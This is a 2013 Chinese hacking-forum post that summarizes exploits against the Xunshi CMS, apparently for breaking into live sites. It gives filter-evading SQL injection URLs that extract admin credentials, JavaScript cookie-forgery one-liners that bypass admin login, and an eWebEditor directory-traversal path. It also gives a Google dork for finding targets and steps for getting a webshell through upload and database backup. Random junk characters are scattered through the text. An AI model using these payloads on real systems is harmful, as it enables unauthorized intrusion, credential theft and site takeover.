中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]
作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘7 g5 r, x2 v1 ~* P6 w
6 l2 M% D1 X& i# z4 s% Q% D1 E9 L& f4 p
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)& T4 k- K* u- [! Y% I

( ]# }# M9 A- S( D# {以下本文总结来自黑防去年第9期杂志上的内容...9 v. W$ \7 W( _* n

) x- w. Q. P( K$ q先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
/ ^( K) \0 K9 n- x6 {3 `" n
9 Q3 V% q. t' z: V8 z26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 - ?: W$ ^' p( ^# g. e

: |. ]" ^0 M2 {2 v$ h% ?记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
; z, }4 ?+ b/ Z0 n# e这里一个注入
7 M7 `, ^  [$ l: j
& p9 O3 d8 x2 @( E# w# F效果如图:
. o! Z, t" w0 W( |  d0 N
; J8 ^; @8 N3 b1 |1 M$ I . a$ K- \& u0 L! ]! g' x9 E

+ Q- d& [+ }& w" ]这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.: s0 R2 y0 B# w) Q3 H1 D# q
$ \/ H$ _& J  q" I3 _
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去) R! l% Y" u7 W1 }# B
7 F% {% {+ f$ o
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));, h! h4 v4 s0 T) ?" f

  A: U8 k* e+ p7 H9 N( @" B那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
. x! \; i9 b8 ~( W* \  l) o% i9 L1 p' D+ E* B
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
4 B$ Z- J0 C) V+ B" X% a: T/ x" H; ^$ i# t
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
* W7 l1 S7 N; Z, w! @( B8 ?+ N. b7 W; i  Q* ?* W# e2 Q5 z9 z
访问这页面来列目录..步骤如下:! m# e: p  c) y
/ Z6 t& D( _) M
javascript:alert(document.cookie="admindj=1") . Y! y$ H  T! v0 ^3 L6 P: I& H/ w* t
' k3 {" D: w* k( H4 U
http://www.political-security.co ... asp?id=46&dir=../..1 C: N0 O& ]/ ?' \
8 \( @3 q9 X! s/ T" d" Q3 `6 Q
效果如图:
" f3 F! |, \% l$ a( _- Z! K! [+ S  K
. P1 z  O5 P5 C0 V ) S% \2 \. i/ N) F: X
' r* o, m- ^$ b  K5 z
这样全站目录都能瞧了..找到后台目录..进去..
, p, T! ^: g! v3 A4 d, I8 Z3 O9 Z  L8 m, f# j
那么进了后台怎么拿shell??上传--备份就ok了..
1 M" f% q) l) P8 T( B5 T% B$ U" n- C, b2 s0 n) r/ x! \3 O
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..' P% J( {4 D5 y! W+ C! h& E1 n! ^1 \% O

* ?* G: ^& m! y) W0 o1 s这个我也碰到过一次..你都可以通过列目录来实现..% q# a; l" n0 w' h9 r2 V  k" \' Y7 D0 s

' z5 `- d/ S, x+ g  T+ qjavascript:alert(document.cookie="admindj=1") ( `0 j1 q/ @. @: Z

6 A" b( f  E0 G1 s. H: L1 `, dhttp://www.political-security.co ... p?action=BackupData
4 f2 t* \% l5 W
6 M; |1 F2 G3 v' \! D备份ok../ a4 N! I* P6 C
  H& I5 ^/ M% e2 Z! @
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?, r( c5 Y9 I' e- _2 I- H

, i' t6 r+ h' {. t* R* l. m- W在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
8 \+ k6 K7 r+ ~6 T/ x8 x/ W
8 g) F3 }( s7 _+ {1 g# `1 h: P然后访问此页面进行注入..步骤如下:/ m0 B( i, j- P* g
9 A. Q! q0 R$ \$ `1 q
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1"): m4 D0 f  i, N5 ^/ h- ^2 b

- I& Z( W* V& i, Q' r. M9 N然后请求admin/admin_chk.asp页面9 m6 `  g: I( R% b( r
0 p2 Q3 l" E8 x5 y9 L! S9 Y+ m
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
: R1 r6 V: W" h. W4 s) S, a5 O+ J8 y: B! y+ `7 [; L- S9 A! x, B' `
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
' B; h% `8 W) d2 D4 R( i/ j# b+ K& d$ C5 q+ x. w8 X) a
效果如图所示:
1 g$ F' c2 `6 ]* c1 I! s
7 L8 S1 V0 }- v) ~5 k% z) f / q( M5 n& a1 Y) u
. J" P. E  G" |
讯时漏洞2+ B1 n7 u4 h/ j( Q* ^
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
6 S- M! T0 U" n" c
: D# U) M7 e% u" @& U1、/admin/admin_news_pl_view.asp?id=1& `" @* L9 r( n* T' S
//id任意 填入以下语句7 g  T1 z) S2 G# b9 A7 D

( b, _1 S2 Q. j. b' F) X3 G2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
: D. Y7 d! I5 S- |) I4 E7 r : A/ H9 s- y- ~0 A( t
! r3 L7 u- `& v: [
. o+ \  E4 G$ ^3 d5 ?3 p/ @, \
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=', |& U0 Y! x$ w4 L& v) I
/ P! k+ F# T9 Y
- P# F) T# u7 k4 c1 P* Q0 w2 p

7 o( j$ K) d: Z  r爆出管理员帐号和密码了
6 x$ Q7 v3 F3 V* J0 l# } ' v$ Q4 P6 u4 d( U: E. |/ t

1 a& c; B5 ?0 R% |# s
4 r4 d" e$ T& G! ^; m4、cookies进后台3 \$ G3 D0 |' i( H& e( Q

, I# ^* |; q) d0 n9 `javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
+ M0 K5 k7 B; y8 t& r+ G8 b
, Y* }8 x: v& p3 N3 J4 |8 V- {5 a+ G5 C3 t+ M7 s  L7 u
( F8 t% n* u+ J. e: E0 c2 {+ T
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
7 S% B6 D/ ?2 g/ H7 V4 `4 _ / o% ~4 {  f- h' U( k1 ?3 R& p
, s7 P3 c& h; C8 z% p

1 N9 x6 v& m5 s6、后台有上传和备份取SHELL不难。
+ R! I  r. S  E; @& S - E: B1 F& s! V5 ?7 U. M! L
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..( F3 J$ y/ v. G2 E' J7 o

2 x+ \/ L7 A. l. Y+ d# w) U逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!1 V3 d+ M: {  @3 u6 H4 f9 ?; k

1 q$ n3 f, E. X/ L# W- W# S# i
8 }3 c8 P+ u% Z, T- T2 h$ A3 f) m, E# k7 e5 [4 ^5 I. Q% g




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2